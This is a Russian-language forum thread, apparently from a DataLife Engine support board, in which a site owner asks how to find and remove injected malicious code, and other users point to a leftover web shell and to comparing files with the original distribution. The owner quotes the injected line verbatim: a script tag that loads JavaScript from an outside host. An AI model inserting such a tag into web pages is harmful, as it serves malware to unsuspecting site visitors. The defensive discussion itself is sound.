Взлом сайта

[Seomotion 0]

Доброй ночи.

Уже не первый раз внедряется вредоносный код на сайт. В прошлый раз решил проблему обновлением до актуальной версии, а сейчас опять та же ерунда. Пароли фтп регулярно меняются, в фтп клиенте не сохраняются. Код внедряется до Доктайпа и имеет вид:

<script src="http://gfgrhtr.oTZO.com/showforum.php?pid=54543" type="text/javascript"></script>

В файлах шаблона его нету. Как его можно найти и удалить, и как предотвратить появление подобной проблемы в дальнейшем.

Речь идёт о сайте, лицензия для которого куплена и окончание JVWNT (в паблике сайт светить не хочу), если надо, в личку кину адрес сайта.

[celsoft 5 992]

Вам модифицируют файлы скрипта, это может быть любой файл. DLE этого не может сделать, значит у вас где то шелл на сервере, возможно остался от предыдущего раза. Вам нужно найти шелл на сервере. Это может быть любой скрипт, не имеющий отношения к стандартным файлам DLE. или внедренный бекдор в файлы скрипта, например файлы в папке engine/data/ не изменяются при обновлении.

[Seomotion 0]

Вам модифицируют файлы скрипта, это может быть любой файл. DLE этого не может сделать, значит у вас где то шелл на сервере, возможно остался от предыдущего раза. Вам нужно найти шелл на сервере. Это может быть любой скрипт, не имеющий отношения к стандартным файлам DLE. или внедренный бекдор в файлы скрипта, например файлы в папке engine/data/ не изменяются при обновлении.

С этим понятно, спасибо. А как можно найти и убрать строчку подключаемого JS? Поиск по всем файлам сайта не помог, по датам изменения файлов тоже ничего не выявилось, в базе тоже всё чисто.

[celsoft 5 992]

Поиск по всем файлам сайта не помог, по датам изменения файлов тоже ничего не выявилось, в базе тоже всё чисто.

Код может быть и зашифрован, а не в открытом виде. В данном случае нужно делать сравнение файлов на сервере в файлами из оригинального дистрибутива.

[Seomotion 0]

Поиск по всем файлам сайта не помог, по датам изменения файлов тоже ничего не выявилось, в базе тоже всё чисто.

Код может быть и зашифрован, а не в открытом виде. В данном случае нужно делать сравнение файлов на сервере в файлами из оригинального дистрибутива.

Ок, перефразирую вопрос: какие файлы движка могут подставлять что-то в шаблон до Доктайпа? Все ведь файлы сравнить не представляется возможным, поэтому хотелось бы сузить круг подозреваемых файлов. И ещё - вредоносный код виден ТОЛЬКо для неавторизованных пользователей.

[celsoft 5 992]

какие файлы движка могут подставлять что-то в шаблон до Доктайпа?

Любые. Они все выполняются на сервере, до вывода шаблона в браузер.

Все ведь файлы сравнить не представляется возможным, поэтому хотелось бы сузить круг подозреваемых файлов.

Вообще то для этого существуют специальные программы, которые позволяют это сделать за секунду в один клик, подобные вещи не вручную делаются.

[Seomotion 0]

какие файлы движка могут подставлять что-то в шаблон до Доктайпа?

Любые. Они все выполняются на сервере, до вывода шаблона в браузер.

Все ведь файлы сравнить не представляется возможным, поэтому хотелось бы сузить круг подозреваемых файлов.

Вообще то для этого существуют специальные программы, которые позволяют это сделать за секунду в один клик, подобные вещи не вручную делаются.

Знаком с пофайловым сравнением кода, может посоветуете какой либо софт для пакетного сравнения?

[lifestar 18]

может посоветуете какой либо софт для пакетного сравнения?

Beyond Compare